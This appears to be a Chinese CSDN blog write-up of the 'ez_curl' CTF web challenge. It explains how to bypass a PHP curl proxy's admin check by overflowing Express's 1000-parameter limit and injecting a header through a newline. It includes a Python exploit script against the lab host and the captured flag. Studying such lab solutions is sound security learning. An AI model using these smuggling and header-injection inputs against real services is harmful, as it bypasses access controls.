【愚公系列】2023年06月 攻防世界-Web(ez_curl)

最新推荐文章于 2024-06-12 21:10:39 发布
最新推荐文章于 2024-06-12 21:10:39 发布
阅读量5.9k 收藏 14
点赞数 8
分类专栏: # CTF-攻防世界-WEB 文章标签: 前端 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa2528877987/article/details/131189077
版权

文章目录

前言

Express是一个流行的Node.js Web框架,它提供了许多有用的功能来构建Web应用程序。其中之一是参数解析,它允许开发者解析HTTP请求中的参数。Express提供了许多选项来配置参数解析。其中之一是parameterLimit选项。

parameterLimit选项用于指定query string或者request payload的最大数量。默认情况下,它的值是1000。如果你的应用程序需要解析大量的查询字符串或者请求负载,你可能需要增加这个限制。例如,如果你的应用程序需要处理非常长的查询字符串,你可以将parameterLimit设置为一个更高的值。

以下是一个示例,演示如何使用parameterLimit选项来增加query string和request payload的限制:

const express = require('express')
const app = express()

// 将parameterLimit设置为10000
app.use(express.json({ parameterLimit: 10000 }))
app.use(express.urlencoded({ parameterLimit: 10000, extended: true }))

在上面的代码中,我们将parameterLimit设置为10000。这将允许我们解析更大的请求负载和查询字符串。

需要注意的是,如果你将parameterLimit设置为一个非常高的值,可能会导致安全问题。攻击者可以发送恶意请求,包含大量参数,导致服务器崩溃。因此,你应该谨慎地设置参数限制,并确保你的应用程序具有有效的安全措施,以防止此类攻击。

一、ez_curl

1.题目

在这里插入图片描述

2.答题

打开题目发现
在这里插入图片描述

<?php
highlight_file(__FILE__);
$url = 'http://back-end:3000/flag?';
$input = file_get_contents('php://input');
$headers = (array)json_decode($input)->headers;
for($i = 0; $i < count($headers); $i++){
    $offset = stripos($headers[$i], ':');
    $key = substr($headers[$i], 0, $offset);
    $value = substr($headers[$i], $offset + 1);
    if(stripos($key, 'admin') > -1 && stripos($value, 'true') > -1){
        die('try hard');
    }
}
$params = (array)json_decode($input)->params;
$url .= http_build_query($params);
$url .= '&admin=false';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_TIMEOUT_MS, 5000);
curl_setopt($ch, CURLOPT_NOBODY, FALSE);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
try hard1

本体两个知识点分别是:

  • express的parameterLimit默认为1000
  • 根据rfc,header字段可以通过在每一行前面至少加一个SP或HT来扩展到多行

第一点:来自源代码的这一行。结合这篇文章的分析,当我们传入的参数超过1000个时,之后的参数会被舍弃掉。于是这里我们最开始发个"admin":"t"设置好admin的值,加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。

第二点:header 字段可以通过在每一行前面至少加一个SP 或 HT 来扩展到多行。以此绕过对 headers 的过滤

python脚本如下:

import requests
import json
from abc import ABC
from flask.sessions import SecureCookieSessionInterface

url = "http://61.147.171.105:58830/"

datas = {"headers": ["xx:xx\nadmin: true", "Content-Type: application/json"],
         "params": {"admin": "true"}}

for i in range(1020):
    datas["params"]["x" + str(i)] = i

headers = {
    "Content-Type": "application/json"
}
json1 = json.dumps(datas)
print(json1)
resp = requests.post(url, headers=headers, data=json1)

print(resp.content)

在这里插入图片描述

得到flag:CatCTF{23aaaab824aadf15eb19f4236f3e3b51}

愚公搬代码
关注
  • 8
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
XCTF(攻防世界)—进阶web题Write Up(一)
Lemon's blog
08-20 1658
前言:这段时间做了一些XCTF的web进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
愚公学堂-时间管理-crx插件
04-04
愚公学堂-时间管理-crx插件】是一款专为中文用户设计的高效时间管理工具,旨在帮助用户更好地规划和追踪他们的日常任务和目标。这款插件采用了CRX格式,这是一种用于Chrome浏览器扩展程序的打包格式,使得用户可以...
攻防世界--lottery、ez_curl、ics-05
最新发布
qq_75120258的博客
06-12 884
array()函数是用来创建一个PHP数组json_decode :对 JSON 格式的字符串进行解码,转换为 PHP 变量。
攻防世界ez_curl
s_hiy_iyi的博客
09-19 528
当Content-Type为application/x-www-form-urlencoded且提交方法是POST方法时,2、加上媒体类型信息:Content-Type: application/x-www-form-urlencoded。substr() 函数返回字符串的一部分。$_POST数据与php://input数据是一致的。,要绕过这个设置,admin不能是false。array()函数是用来创建一个PHp数组。SP指的是空格,HT指的是制表符。1、GET修改为POST方法。
WEB:ez_curl
sleepywin的博客
07-21 381
第一点:来自源代码的这一行。当我们传入的参数超过1000个时,之后的参数会被舍弃掉。于是这里我们最开始发个"admin":"t"设置好admin的值,加上999个没用的参数,把程序拼接的&admin=false挤掉,即可绕过过滤。第二点:header 字段可以通过在每一行前面至少加一个SP 或 HT 来扩展到多行。以此绕过对 headers 的过滤。打开题目发现,进行代码审计。
攻防世界——fakebook
m0_62063669的博客
06-22 1803
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
攻防世界Web新手练习篇
m0_63944500的博客
11-19 2231
写给刚接触CTF的萌新,感谢支持,谨以此文献给去的自己。
攻防世界web题目记录(一)
wanan的博客
10-06 2832
攻防世界web题目记录(一)
20XX学习新愚公精神心得体会.docx
01-23
20XX学习新愚公精神心得体会.docx
ali愚公项目配置说明
08-23
内含ali愚公项目的安装配置细节,与实际使用中需要注意的事项。
2021研学旅行系列王屋镇愚公学校研学旅行活动总结.doc
08-08
在整个研学过程中,同学们自觉遵守纪律、注意安全、文明有礼、活动有序、爱护环境、团结友爱,充分体现了愚公学校的良好校风。 此外,本文还描述了女性的四季美丽。女人的美丽就像春天的桃花,夏日的荷花,秋天的...
员工福利系列模板-C10小故事大道理.doc
04-29
【员工福利系列模板-C10小故事大道理.doc】是一个关于公司人事相关的文档,通过一系列小故事传达大道理,帮助员工提升个人素质和工作能力。这些故事涵盖了多个方面,包括计划拟定、目标设定、坚持不懈、效率提升、...
攻防世界】学习记录-web(系数4)
龟速更新的九某人
10-12 1469
攻防世界】学习记录-web(系数4) 0072 Cat 0097 Confusion1 0223 FlatScience 0992 题目名称-文件包含
攻防世界web-Cat
m0_68074153的博客
07-30 986
攻防世界web-Cat
攻防世界】网鼎杯2018 Web fakebook
DG_s1mple
12-31 939
curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。:会传入一个url值,就是我们输入的blog值,然后会curl这个url,把url返回的内容输出到页面上,curl是可以使用file协议来包含文件的。这里给了一个链接说是博客页面,猜测就是这里使用了curl获取页面,暂时还不知道怎么利用,我们再看看有没有什么能提供思路的地方。是一段序列化后的字符串,那思路就很明确了,我们需要反序列化他,传入恶意的代码。
攻防世界ezbypass-cat
wangzhemvp的博客
04-11 245
突然想到有可能是权限绕过的问题,因为以login开头的登录界面一般是白名单,原理简单来说就是访问白名单目录login.html,然后通过…/回到正常目录下,再访问flag.html。
攻防世界】Cat
wangzhemvp的博客
04-11 417
2.在url中输入%79,变成y 了。说明服务器对我们输入的内容会进行 url解码 并显示到url上。url 编码使用的是 16 进制,80 也就是 128,ASCII 码是从 0-127,所以传递。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。django编码方式为gbk,超过了ascii码范围就会报错。3.从报错信息中,要知道 Django 框架。1.知道是命令行,可以ping操作,可以。没反应,说明过滤了。4.通过报错,可以获取信息。当作绝对路径请求,来读取文件。
攻防世界刷题小记
m0_73728268的博客
10-10 696
攻防世界刷题小记
攻防世界Triangle
08-31
攻防世界Triangle是一个网页渗透测试题目,分为四个步骤:分析、实操、答案和参考。 在这个题目中,除了基本的渗透测试技巧外,还涉及到一些高级特性,如预加载应用程序、调整Worker进程的数量等,以进一步提高系统的性能和可伸缩性。 根据引用中的代码和链接,Triangle题目可能涉及到一些编码和解码操作,需要进一步分析和实操才能得到答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [攻防世界WEB进阶之Triangle](https://blog.csdn.net/harry_c/article/details/98669424)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【愚公系列202306 攻防世界-Web(Triangle)](https://blog.csdn.net/aa2528877987/article/details/131323719)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值